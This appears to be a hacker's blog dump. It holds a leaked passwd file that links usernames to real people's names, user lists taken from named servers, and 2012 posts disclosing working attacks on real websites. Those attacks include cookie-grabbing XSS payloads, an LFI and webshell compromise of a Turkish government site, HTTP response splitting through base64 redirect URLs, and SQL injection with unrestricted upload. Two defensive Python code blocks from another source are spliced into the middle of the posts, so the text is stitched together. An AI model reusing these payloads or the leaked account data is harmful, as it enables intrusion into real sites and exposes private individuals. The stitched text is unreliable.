gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/var/ftp:
nobody:x:99:99:Nobody:/:
apache:x:48:48:Apache:/var/www:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
mailnull:x:47:47::/var/spool/mqueue:/dev/null
xerox:x:500:500:xerox:/home/xerox:/bin/bash
kwmo37:x:501:100::/home/kwmo37:/bin/bash
sopl69:x:502:100::/home/sopl69:/bin/bash
schnakey:x:514:920:Eberle Frank:/home/schnakey:/bin/bash
pr0t3ct:x:516:920:Jeske Joerg:/home/pr0t3ct:/bin/bash
wiggs0r:x:517:920:Jäckel Matthias:/home/wiggs0r:/bin/ushell
H5386B:x:524:920:Athmer Johannes:/home/H5386B:/bin/ushell
dune1:x:528:920:Schreiter Tilo:/home/dune1:/bin/bash
thyla:x:529:920:Kriebitz Cornelia:/home/thyla:/bin/bash
mue:x:531:920:Mücke Andreas:/home/mue:/bin/ushell
loewe69:x:532:920:Matzerath Frank:/home/loewe69:/bin/bash
coreit:x:536:920:Reder Daniel:/home/coreit:/bin/ushell
alexa:x:538:920:Berger Reinhard:/home/alexa:/bin/bash
deadfish:x:542:920:Sättler Markus:/home/deadfish:/bin/bash
falke:x:543:920:Homburg Tim:/home/falke:/bin/ushell
looser:x:546:920:Knappstein Thomas:/home/looser:/bin/bash
botshell:x:547:920:Lange Sebastian:/home/botshell:/bin/bash
icecold:x:550:920:Holtkamp Martin:/home/icecold:/bin/ushell
dragon:x:554:920:Nickel Christian:/home/dragon:/bin/bash
HellCop:x:556:920:Lehnen Thomas:/home/HellCop:/bin/bash
Hardwire:x:557:920:Böttjer Marco:/home/Hardwire:/bin/ushell
draven:x:562:920:Ogris Christian:/home/draven:/bin/ushell
engel1:x:563:920:Schmelzer Sven:/home/engel1:/bin/bash
sw77rtx:x:566:920:Meinhardt Andreas:/home/sw77rtx:/bin/bash
Matrix2k:x:581:920:Schrake Marcel:/home/Matrix2k:/bin/bash
FlatRate:x:582:900:Schnepf Andreas:/home/FlatRate:/bin/bash
tenjou:x:592:900:Kalthoff Rainer:/home/tenjou:/bin/bash
killer:x:609:700:Herrmann Armin:/home/killer:/bin/bash
davide:x:610:100:pietro paganoni:/home/davide:/bin/bash
ruzz:x:617:100:sanchez vidal javier:/home/ruzz:/bin/bash
blub_1:x:619:100:Bräunig Erich:/home/blub_1:/bin/bash
gammaray:x:639:900:Möhle Gunther:/home/gammaray:/bin/bash
markyg:x:641:100:garland mark:/home/markyg:/bin/ushell
katz:x:652:501:Katz Jochen:/home/katz:/bin/bash
link:x:661:100:Key Anne R.:/home/link:/bin/bash
Urli:x:667:501:Schweitzer Thorsten:/home/Urli:/bin/ushell
nos:x:670:900:Luciani Paola:/home/nos:/bin/ushell
mary:x:676:501:overbrook place angie:/home/mary:/bin/bash
jorge_hh:x:681:600:Davidsohn Jorge:/home/jorge_hh:/bin/bash
kirpi:x:687:2000:Popp Günther:/home/kirpi:/bin/bash
p3885371:x:688:110:Pingel Daniel:/home/p3885371:/bin/ushell
rexirtaM:x:692:1400:Wieck Ronny:/home/rexirtaM:/bin/ushell
Freestyl:x:696:100:Schulz Hans-Jürgen:/home/Freestyl:/bin/bash
CarloMHL:x:698:100:Rimpel Karl-Heinz:/home/CarloMHL:/bin/bash
teeeuk:x:700:100:bailey eve:/home/teeeuk:/bin/bash
moclam:x:702:1400:zampieri oscar:/home/moclam:/bin/bash
TheBoss:x:703:900:Lazar Cristian:/home/TheBoss:/bin/bash
nachos:x:706:100:Lahr Florian:/home/nachos:/bin/bash
necrobot:x:708:900:Wimmer Oliver M.:/home/necrobot:/bin/bash
freak:x:718:900:Soldato Kevin:/home/freak:/bin/bash
AnnaLena:x:727:900:Huck Sebastian:/home/AnnaLena:/bin/bash
kilyan:x:731:100:Cardella Giuseppe:/home/kilyan:/bin/bash
abba:x:736:900:De Santis Francesco:/home/abba:/bin/bash
vania:x:740:1400:Oscar Zampieri:/home/vania:/bin/bash
mod:x:748:900:Eiberger Peter:/home/mod:/bin/bash
bluecat:x:749:110:Nesi Sandra:/home/bluecat:/bin/ushell
marcus:x:752:900:Leffler Marcus:/home/marcus:/bin/bash
Basc:x:753:900:Schaefer Bastian:/home/Basc:/bin/ushell
one:x:758:900:Podkanski Thomas:/home/one:/bin/ushell
narcis:x:759:900:Luca Narcis:/home/narcis:/bin/ushell
HSP:x:761:900:Koss Marcel:/home/HSP:/bin/bash
Skyn3t:x:769:110:Cerato Lodovico:/home/Skyn3t:/bin/ushell
gemelli:x:772:1400:magni oliviero:/home/gemelli:/bin/bash
cool771:x:777:910:hartmann markus:/home/cool771:/bin/bash
BEATLES:x:780:110:FRADEGRADI AMELIO:/home/BEATLES:/bin/ushell
remove:x:784:1400:Katts Hank:/home/remove:/bin/ushell
rachel:x:790:900:jonsson stillit cinzia:/home/rachel:/bin/bash
martina:x:792:1400:Oscar Zampieri:/home/martina:/bin/bash
d-fiant:x:796:501:Hartung Tim:/home/d-fiant:/bin/bash
GrafBot:x:799:900:Bier Frederic:/home/GrafBot:/bin/ushell
volley:x:807:900:Francesco De Santis:/home/volley:/bin/bash
speyburn:x:808:110:endlich mitch:/home/speyburn:/bin/bash
espilce:x:813:1400:Oscar Zampieri:/home/espilce:/bin/bash
gold:x:814:401:Balice Stefano:/home/gold:/bin/bash
DM33:x:815:900:Gubo Johannes:/home/DM33:/bin/bash
DJquattr:x:820:110:Schmidt Martin:/home/DJquattr:/bin/ushell
Voegli:x:821:900:Zimmermann Manuel:/home/Voegli:/bin/ushell
B1tch:x:822:900:kolmer christian:/home/B1tch:/bin/ushell
quasar:x:825:100:Virdis Francesco:/home/quasar:/bin/bash
Arzan:x:827:910:Tondelli Marco:/home/Arzan:/bin/bash
kai:x:831:900:Wiederich Kai:/home/kai:/bin/ushell
popa3d:x:835:2001::/dev/null:/dev/null
gnikeht:x:842:1400:Mario Ghersi:/home/gnikeht:/bin/bash
lovely:x:843:900:pogotrestkaya valerie:/home/lovely:/bin/ushell
DarkCrow:x:844:700:Borges Christian:/home/DarkCrow:/bin/ushell
igor75:x:845:501:Baur Andreas:/home/igor75:/bin/bash
muffl0n:x:852:900:Schliesing Sven:/home/muffl0n:/bin/bash
defi:x:855:900:Massong Thomas:/home/defi:/bin/bash
papa:x:856:900:Soldato Kevin:/home/papa:/bin/bash
Nemesis2:x:857:100:Götz Jürgen:/home/Nemesis2:/bin/ushell
baum:x:858:910:setzer christian:/home/baum:/bin/bash
winzky:x:859:401:Ryder James:/home/winzky:/bin/bash
BGK:x:860:1400:Skarphedinsson Ingolfur:/home/BGK:/bin/bash
rekoJ:x:862:1400:Ovini Renato:/home/rekoJ:/bin/bash
dupe004:x:863:900:tardy Werner:/home/dupe004:/bin/ushell
penguin:x:870:910:Schankweiler Tobias:/home/penguin:/bin/bash
lajja:x:877:110:Basinger Melvin:/home/lajja:/bin/ushell
spookydj:x:883:110:Scaffidi Domian Salvatore Domen:/home/spookydj:/bin/bash
xovaviv:x:887:1400:zanasi franco:/home/xovaviv:/bin/bash
dca1:x:889:110:paganoni pietro:/home/dca1:/bin/bash
frozzz3:x:891:1400:balboa rocky:/home/frozzz3:/bin/ushell
GiGiDaG:x:892:520:TOMMASO SANGUIGNI:/home/GiGiDaG:/bin/bash
Orion:x:899:501:Blaas Jürgen:/home/Orion:/bin/bash
wario:x:902:110:garozzo mario:/home/wario:/bin/bash
Sled:x:903:2000:Rieger Thomas:/home/Sled:/bin/bash
druido:x:905:110:magni oliviero:/home/druido:/bin/bash
Boss:x:914:100:Tisbo Benedetto:/home/Boss:/bin/bash
quizzica:x:917:1400:Eduan Boqir:/home/quizzica:/bin/ushell
Miss_X:x:921:501:Jurincic Alen:/home/Miss_X:/bin/ushell
drew:x:922:110:Miller Drew:/home/drew:/bin/bash
bl4d3:x:923:910:Spadari Lorenzo:/home/bl4d3:/bin/ushell
bota:x:924:910:andrew Brandino:/home/bota:/bin/ushell
Rod:x:925:1400:Frank Stefan:/home/Rod:/bin/bash
RAGE:x:928:100:Allaway Chris:/home/RAGE:/bin/ushell
tornado:x:929:110:Bedwell John:/home/tornado:/bin/bash
thewall:x:930:900:Monteleone Lorenzo:/home/thewall:/bin/ushell
guard:x:932:1400:Martinelli Sharon C:/home/guard:/bin/ushell
OAREV:x:934:1400:ZANASI FRANCO:/home/OAREV:/bin/ushell
pod:x:935:200:Beier Maximilian:/home/pod:/bin/ushell
nwarht:x:936:700:Frohnert Fabio:/home/nwarht:/bin/bash
pDee:x:938:900:Krug Alexander:/home/pDee:/bin/bash
simona:x:939:910:Di Lorenzo Roberto:/home/simona:/bin/bash
DarkMark:x:941:900:Knaack Joram:/home/DarkMark:/bin/ushell
ngl:x:943:400:Paol Casey:/home/ngl:/bin/ushell
luma:x:946:900:Schindler Oliver:/home/luma:/bin/bash
rekees:x:947:700:strohschen Dirk:/home/rekees:/bin/ushell
xtra:x:949:110:Bedsaul Alan:/home/xtra:/bin/bash
Wombad:x:951:110:Pilz Han:/home/Wombad:/bin/bash
skace:x:952:900:Kiehne Stefan:/home/skace:/bin/ushell
private:x:953:850:Anderson Silvia:/home/private:/bin/ushell
samy:x:954:850:Schrauth Dominik:/home/samy:/bin/bash
Bottane:x:957:900:De Min Nicholas:/home/Bottane:/bin/bash
tnel01v:x:958:1400:Qayum Mizan:/home/tnel01v:/bin/bash
d3lta:x:959:401:conti daniele:/home/d3lta:/bin/bash
onez:x:964:910:Allen Newkirk Craig:/home/onez:/bin/bash
Kosh:x:965:302:Strohschen Dirk:/home/Kosh:/bin/ushell
Nirvana:x:967:900:Devir Mahsan:/home/Nirvana:/bin/ushell
roman:x:970:900:Ricciardelli Antonio:/home/roman:/bin/bash
ricchie:x:971:110:SKOROBATSCH PAUL:/home/ricchie:/bin/ushell
toba:x:972:910:Noto Christopher:/home/toba:/bin/ushell
jem:x:974:520:Rothweiler Timo:/home/jem:/bin/ushell
BierFass:x:980:501:Mattick Manfred:/home/BierFass:/bin/ushell
klaus_:x:982:1400:Blumer Klaus:/home/klaus_:/bin/bash
fonzie:x:983:900:buono franco:/home/fonzie:/bin/bash
gott:x:984:990:Hübener Sebastian:/home/gott:/bin/bash
luv:x:985:910:François Mogeon:/home/luv:/bin/ushell
sCoX:x:987:900:arslan metin:/home/sCoX:/bin/ushell
heaven:x:989:1400:Manno Giuseppe:/home/heaven:/bin/bash
SeeeR:x:990:900:Giuliani Samuele:/home/SeeeR:/bin/bash
SFRANTA1:x:991:110:MARIA TERESA D"AFFRONTO:/home/SFRANTA1:/bin/bash
eiloj:x:992:1400:Compagnone Bruno:/home/eiloj:/bin/bash
maGo:x:993:100:Gemelli Giuseppe:/home/maGo:/bin/ushell
sun1:x:994:700:domenico telesca:/home/sun1:/bin/bash
bsk:x:995:401:olivieri fabio:/home/bsk:/bin/ushell
FoOd:x:996:401:roberto ravaioli:/home/FoOd:/bin/bash
ububa:x:997:1400:Anicito Massimo:/home/ububa:/bin/bash
kutusow:x:998:100:Fassbender David:/home/kutusow:/bin/bash
insanity:x:999:1400:Robinson Scott:/home/insanity:/bin/ushell
cyron:x:1000:700:Szau Bastian:/home/cyron:/bin/bash
cub:x:1001:910:Baielli Paola:/home/cub:/bin/ushell
lumino:x:1002:302:Bruno Marcello:/home/lumino:/bin/bash
Mo-r-do:x:1003:700:kannenberg christian:/home/Mo-r-do:/bin/bash
yama:x:1004:100:yama` anton:/home/yama:/bin/bash
Burney:x:1005:100:Musci Francois:/home/Burney:/bin/bash
ma0ri:x:1007:1400:Compagnone Bruno:/home/ma0ri:/bin/bash
bildo:x:1008:100:Mura Giovanni:/home/bildo:/bin/ushell
lex:x:1009:900:Iacomi Dimitri:/home/lex:/bin/ushell
f1re:x:1010:900:Ernst Sascha:/home/f1re:/bin/ushell
rkda:x:1011:1400:Cusato Francesca:/home/rkda:/bin/bash
iroam:x:1012:1400:Compagnone Bruno:/home/iroam:/bin/bash
alturiak:x:1013:900:Gerstner Markus:/home/alturiak:/bin/bash
xednaM:x:1014:1400:Genovese Andrea:/home/xednaM:/bin/bash
Tom-loff:x:1015:700:Pätzold Thomas:/home/Tom-loff:/bin/ushell
JFK:x:1016:100:Schuler Carina:/home/JFK:/bin/ushell
oznam:x:1017:1400:Marzetti Marco:/home/oznam:/bin/ushell
lallo:x:1018:1400:leonardo pedicelli:/home/lallo:/bin/bash
xdu:x:1019:1400:pedicelli leonardo:/home/xdu:/bin/bash
StoMride:x:1020:600:Mueller Stephan:/home/StoMride:/bin/bash
ShortDee:x:1021:900:Marku Dennis:/home/ShortDee:/bin/ushell
planet:x:1022:920:Zeindl Florian:/home/planet:/bin/ushell
CioZzoLo:x:1023:302:salvatore ciaddu:/home/CioZzoLo:/bin/bash
lsSkul:x:1024:1400:Lungo Gianpiero:/home/lsSkul:/bin/ushell
umsp3ctr:x:1025:1400:Lungo Andrea:/home/umsp3ctr:/bin/bash
X-1r0:x:1026:1400:Centenaro Giulio:/home/X-1r0:/bin/bash
Panther:x:1027:700:Thams Stefan:/home/Panther:/bin/bash
WeapoN:x:1028:100:Di Lorenzo Roberto:/home/WeapoN:/bin/bash
evol:x:1029:401:Rossello Pietro:/home/evol:/bin/bash
ztz:x:1030:1400:Seefelder Sascha:/home/ztz:/bin/ushell
jeanlu:x:1031:100:zaghi luca:/home/jeanlu:/bin/bash
redvex:x:1032:900:Savalli Giuseppe:/home/redvex:/bin/bash
sweet:x:1033:700:Janusz Marcin:/home/sweet:/bin/ushell
psyko:x:1034:900:Santarelli Massimiliano:/home/psyko:/bin/ushell
serazzo:x:1035:900:giuliani samuele:/home/serazzo:/bin/bash
QuizIt:x:1036:1400:Martina Martina:/home/QuizIt:/bin/bash
kraddt:x:1037:800:Femmino" Pietro:/home/kraddt:/bin/bash
ski:x:1038:100:bjarnadottir jona:/home/ski:/bin/ushell
voodoo:x:1039:700:Strohschen Dirk:/home/voodoo:/bin/ushell
Sisko:x:1040:700:Söllner Bastian:/home/Sisko:/bin/ushell
Elviz:x:1041:700:Helmes Rainer:/home/Elviz:/bin/ushell
cleon:x:1042:110:filippini marco:/home/cleon:/bin/bash
dream0r:x:1043:1400:Loose Mathias:/home/dream0r:/bin/ushell
Sp33dY:x:1044:700:Huber Michael:/home/Sp33dY:/bin/bash
tidnaB:x:1045:1400:Kovacs Zoltan:/home/tidnaB:/bin/bash
k1cpr2:x:1046:1400:Roberts Craig:/home/k1cpr2:/bin/ushell
B4D:x:1047:200:Ricciardi Stefano:/home/B4D:/bin/ushell
Socksto:x:1048:110:Gian Luigi Bosco:/home/Socksto:/bin/bash
aFaD:x:1049:1400:Becker Anna:/home/aFaD:/bin/ushell
RusTy_X:x:1050:401:Lay Bee Woo:/home/RusTy_X:/bin/bash
nicko:x:1052:100:ciribè christian:/home/nicko:/bin/bash
oknird:x:1053:1400:Paparo Alessandro:/home/oknird:/bin/bash
revol2so:x:1054:1400:Baum Olivier:/home/revol2so:/bin/ushell
solaris:x:1055:900:Pasqui Marko:/home/solaris:/bin/ushell
verTex:x:1056:700:von Ardenne Johannes:/home/verTex:/bin/bash
marlboro:x:1057:401:vincenzo sidari:/home/marlboro:/bin/bash
victory:x:1058:100:paolo traballoni:/home/victory:/bin/bash
seezer:x:1059:900:Goth Sebastian:/home/seezer:/bin/ushell
annoyed:x:1060:1100:scarrà danilo:/home/annoyed:/bin/ushell
gaio:x:1061:401:serravezza andrea:/home/gaio:/bin/bash
s0ka:x:1062:401:Barberi Gambone Giuseppe:/home/s0ka:/bin/bash
Southern:x:1063:401:aversano roberto:/home/Southern:/bin/bash
saras:x:1064:510:Barnes Misty:/home/saras:/bin/bash
belenos:x:1065:100:Quittan Martha Kay:/home/belenos:/bin/bash
m1st4ke:x:1066:100:Paciarelli Simone:/home/m1st4ke:/bin/bash
amater:x:1067:900:Buono Francesco:/home/amater:/bin/ushell
KaTrUm4:x:1068:100:SALVATORE CIADDU:/home/KaTrUm4:/bin/bash
rpm:x:37:37::/var/lib/rpm:/bin/bash
redwater:x:1069:900:Dontchev Sacho:/home/redwater:/bin/bash
maxxboxx:x:1070:600:Rehfeldt Frank:/home/maxxboxx:/bin/bash
n0ru4S:x:1071:1400:Castriotta Michele:/home/n0ru4S:/bin/bash
hak3d:x:1072:100:Barberi Gambone Giuseppe:/home/hak3d:/bin/bash
c0816:x:1073:800:Schneider Manuel:/home/c0816:/bin/bash
Boy:x:1074:401:Pirani Gianfranco:/home/Boy:/bin/bash
zregit:x:1075:1400:Matin Abdul:/home/zregit:/bin/bash
mAxIm:x:1076:401:Aquila Massimo:/home/mAxIm:/bin/bash
M3tSleeP:x:1077:1400:Falco Gianluca:/home/M3tSleeP:/bin/bash
IlCorvob:x:1078:1400:Ruocco Salvatore:/home/IlCorvob:/bin/bash
PedroDJ:x:1079:100:Giannelli Pietro:/home/PedroDJ:/bin/bash
server23:x:1080:100:Dauer Maria:/home/server23:/bin/bash
remote:x:1081:900:terenzio festo:/home/remote:/bin/bash
robertje:x:1082:900:Jonker Robert:/home/robertje:/bin/bash
pArAnOiC:x:1083:900:Gatto Marcello:/home/pArAnOiC:/bin/bash
BladeXP:x:1084:100:Schug Tobias:/home/BladeXP:/bin/bash



-------web.hippowarez.cz-------
root
toor
daemon
operator
bin
games
news
man
uucp
xten
nobody
fax
ftp
hippo
phippo
cyrus
mysql
annett
pgsql
major
palo
nss
demo
demo4
demo3
demo2
demo1
jezeksw
fandsoft
zasi
hippos
madamshop
hippoware
crctechnik
byttextil
hadek
eurocity

-------www.russia.cz-------
root
toor
daemon
operator
bin
tty
kmem
games
news
man
bind
uucp
xten
pop
nobody
kapitan
mysql
mafo
cyril
eva
ivo
zld
deribin
humtech
eska
money
krona
admin
marie
djason
stealth
trnecek
poulson
dus
alena
grygar
benkova
vanova
marta
havlova
kozel
unique
edward
glebb
jack
ftp



---nicki.moravia-consulting.cz---
root
halt
daemon
operator
bin
games
uucp
ppp
ftp
nobody
ivana
alois
ivona
jana
renata
dalibor
jarka
markus
dana
vilem
martin
hana
petr
radovan
katka
olga
helena
pavel
pavlina
marek
dusan
student
daniela
skinhead
mirek
david
petra
pavelr
robert
radek
pavels
oliver
josef
jiri
vera
dariusz
moravia
calc-pl
ljocha
sausage


---math.feld.cvut.cz---
root
nobody
daemon
sys
bin
uucp
news
ingres
audit
sync
sysdiag
sundiag
pollara
k301
demlova
adamek
olsak
krajnik
dont
gregorj
navara
nemecek
rogalewi
tkadlec
hamhalte
ptak
brabec
bartik
tiser
zornig
bosak
novakova
nagy
fiedler
prucha
hekrdla
veit
jankovsk
valasek
velebil
kohout
sturm
kucerova
kalous
bilek
veronika
volak
svobodj
korbar
pultar
reiterma
sgp96p
barbw
adamrosi
hovorka
cizek
iqsa
prosek
ftp
ftphide
ws97




NOTE: Those websites/hosts/servers were shut down a long time ago. This is why I'm publishing this information.

Tuesday, 31 January 2012

http://servizi.pdl.it/ | XSS

http://servizi.pdl.it/cartoline/adesioni/segnala.php

just
<script>alert(document.cookie);</script>
in the form

Friday, 13 January 2012

kutuphane.tuik.gov.tr | data leak, system compromise, HTTP splitting, XSS.

-Data leak-

http://kutuphane.tuik.gov.tr/yordambt/liste.php?-skip=0&-atla=0&-sayfa=01&Alan3=&Alan5=&anatur=&bolum=&alttur=&sekil=&ortam=&dil=&yayintarihi=&kgt=&gorsel=&kurumyayini=&cAlanlar=pollo&aa=eseradi&-max=16&universite=&enstitu=&anabilimdali=&bilimdali=&sureliilkharf=&sure=&biryil=&birdergitrh=&birsayi=&biricindekiler=

The error messages disclose the full path of the web root:
-> C:\Inetpub\wwwroot\yordambt
Affected files (examples): _dil.php | index.php | liste.php | _yardim.php | arama.php | anasayfa.php | url.php


After getting access through an LFI, it's possible to see that we are on a (Windows) box with the default configuration, with permissions for -everybody- on some important folders. It's possible to operate much like an administrator with a simple -webshell- script.
There are some shared folders without a password on other boxes.
------

The scripts available from the website (also) interact with other web servers on the local network, where other documents are located.
Example: http://10.1.2.49/pdf/0016384.pdf

This information can be obtained from a simple search. Sample URL:
http://kutuphane.tuik.gov.tr/yordambt/url.php?-action=new&-url=aHR0cDovLzEwLjEuMi40OS9wZGYvMDAxNjM4NC5wZGY=&demirbas=0016384

Here we can clearly see a base64-encoded string ( aHR0cDovLzEwLjEuMi40OS9wZGYvMDAxNjM4NC5wZGY -> http://10.1.2.49/pdf/0016384.pdf ).

We can easily change the redirect target to any other website (the Location header).

This example redirects to this website/blog ( http://trueliarx.blogspot.com ):
http://kutuphane.tuik.gov.tr/yordambt/url.php?-action=new&-url=aHR0cDovL3RydWVsaWFyeC5ibG9nc3BvdC5jb20v&demirbas=0016384

Obviously we are facing an HTTP splitting problem, and we can add other malicious stuff instead of redirecting.
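As an added defensive example (not code from this post or from the site), here is how a redirector of this shape can validate its base64 `-url` parameter before placing it in a Location header: decode strictly, reject control characters (CR/LF is exactly what turns an open redirect into response splitting), and only issue the redirect for http(s) targets whose host is on an allow-list. The allow-list, the function names and the rejected inputs are constructed for the example; the two encoded values are the ones shown in the post.

```python
import base64
import binascii
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Constructed allow-list for this example: the internal document server the
# post shows the redirector pointing at. A real deployment lists its own hosts.
ALLOWED_HOSTS = {"10.1.2.49"}


def encode_target(url: str) -> str:
    """Build the base64 form of a target URL (used here to construct inputs)."""
    return base64.b64encode(url.encode("ascii")).decode("ascii")


def validate_redirect(encoded: str) -> Tuple[Optional[str], str]:
    """Check a base64 '-url' parameter before it goes into a Location header.

    Returns (target, "ok") when the redirect may be issued, otherwise
    (None, reason). Every rejection happens before the value touches a header.
    """
    # 1. Strict base64: characters outside the alphabet or bad padding are an
    #    error, not something to discard silently.
    try:
        raw = base64.b64decode(encoded, validate=True)
    except (binascii.Error, ValueError):
        return None, "malformed base64"

    # 2. Header values are ASCII; anything else is not a URL we want to emit.
    try:
        target = raw.decode("ascii")
    except UnicodeDecodeError:
        return None, "non-ASCII bytes in target"

    # 3. CR, LF and other control characters end the header line in the
    #    response, which is what lets extra headers or a body be injected.
    #    Check the raw string: urlsplit() strips some of these and would hide them.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return None, "control character in target"

    # 4. Only absolute http(s) URLs whose parsed host is on the allow-list.
    #    Using parts.hostname defeats "http://allowed@other.example/", where the
    #    allowed name appears only as userinfo.
    try:
        parts = urlsplit(target)
    except ValueError:
        return None, "unparseable URL"
    if parts.scheme not in ("http", "https"):
        return None, "scheme not allowed"
    if parts.hostname is None or parts.hostname.lower() not in ALLOWED_HOSTS:
        return None, "host not allowed"
    return target, "ok"


if __name__ == "__main__":
    # The first value from the post decodes to the internal PDF and is accepted;
    # the second, which sends users to an external blog, is refused.
    for enc in ("aHR0cDovLzEwLjEuMi40OS9wZGYvMDAxNjM4NC5wZGY=",
                "aHR0cDovL3RydWVsaWFyeC5ibG9nc3BvdC5jb20v"):
        print(enc, "->", validate_redirect(enc))
```

The order of the checks matters: the control-character test runs on the decoded string before any URL parsing, because recent Python versions of `urlsplit()` silently remove tab and newline characters and a parse-then-check approach would pass a split payload through.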


-------------------------------------------------------------------------------------

I suppose that the website has something to do with a -library- (?). I cannot understand Turkish.

Thursday, 12 January 2012

www.ascension-tech.com | XSS

This XSS is blocked by the web server:
www.ascension-tech.com/searchresults.asp?searWords=<script>alert(document.cookie);</script>&Go.x=0&Go.y=0

This one works without problems because a JavaScript snippet uses the input without sanitizing it. It seems that only the first single quote (') is escaped... so we add another one:
http://www.ascension-tech.com/searchresults.asp?searWords=%27%27%3Balert%28%271%27%29%3Bvar+asd%3D%27&Go.x=12&Go.y=12


The problem is within "Search Engine Builder 2010"
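The two XSS findings above differ only in the context the input lands in: the pdl.it form reflects it into the HTML body, while the ascension-tech search page reflects it into a JavaScript string literal and escapes only the first single quote. The following is an added example, not code from either site or from "Search Engine Builder 2010": it renders a search page with the input in both contexts, puts the weak first-quote-only escaping beside a hardened encoding, and includes a small scanner (a demonstration check written for this example) that walks the inline script the way a JS tokenizer would to tell whether the input stayed inside the string. The page layout, the `searWords` variable name and the inputs are constructed.

```python
import html
import json


def escape_first_quote_only(value: str) -> str:
    """The weak approach the post describes: only the first single quote is
    escaped. Constructed illustration of the failure mode, not the site's code."""
    return value.replace("'", "\\'", 1)


def js_string_literal(value: str) -> str:
    """Hardened encoding for a value placed inside an inline <script> string.

    json.dumps() escapes quotes, backslashes and control characters; the extra
    replacements turn '<', '>' and '&' into \\uXXXX escapes so the HTML parser
    never sees a '</script>' inside the literal and no markup is reflected.
    JavaScript decodes the escapes back to the original characters at runtime.
    """
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_search_page(query: str, weak: bool = False) -> str:
    """Render a results page that reflects the query in two contexts: the HTML
    body (html.escape) and a JavaScript string (js_string_literal, or the weak
    single-quote escaping when weak=True)."""
    body = html.escape(query, quote=True)
    if weak:
        script_value = "'" + escape_first_quote_only(query) + "'"
    else:
        script_value = js_string_literal(query)
    return ("<p>Results for: " + body + "</p>\n"
            "<script>var searWords = " + script_value + ";</script>")


def script_value_stays_a_string(rendered: str) -> bool:
    """Scan the inline script the way a JS tokenizer would: after the opening
    quote a backslash escapes the next character and the first unescaped
    matching quote ends the literal. True only if nothing but the closing ';'
    follows, i.e. the reflected input never left the string context."""
    marker = "var searWords = "
    i = rendered.index(marker) + len(marker)
    quote = rendered[i]
    i += 1
    while i < len(rendered):
        c = rendered[i]
        if c == "\\":
            i += 2          # escaped character, whatever it is
            continue
        if c == quote:
            return rendered[i + 1:] == ";</script>"
        i += 1
    return False            # unterminated literal


if __name__ == "__main__":
    # The payload from the post: a second quote closes the weakly escaped
    # literal and the rest becomes code; the hardened encoding keeps it a string.
    payload = "'';alert('1');var asd='"
    print("weak    :", script_value_stays_a_string(render_search_page(payload, weak=True)))
    print("hardened:", script_value_stays_a_string(render_search_page(payload)))
```

The point of the scanner is that "is the output safe" is a question about the parser that consumes it: the HTML body must be judged by an HTML parser (hence `html.escape`), and a value inside a script must be judged by the JavaScript tokenizer, which is why escaping a single occurrence of one character can never be sufficient.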

www.ovosodo.net | Flash XSS - Sql Injections - possible upload of scripts - administrator privileges escalation (system compromise)

(they no longer work - check web caches)
www.ovosodo.net
XSS in the requests (simple)

SQL injection (there's no need to write the injection string... it's very simple)
http://www.ovosodo.net/area_clienti.asp

After *login* it's possible to upload anything, which is then available at
http://www.ovosodo.net/images/upload/originali/
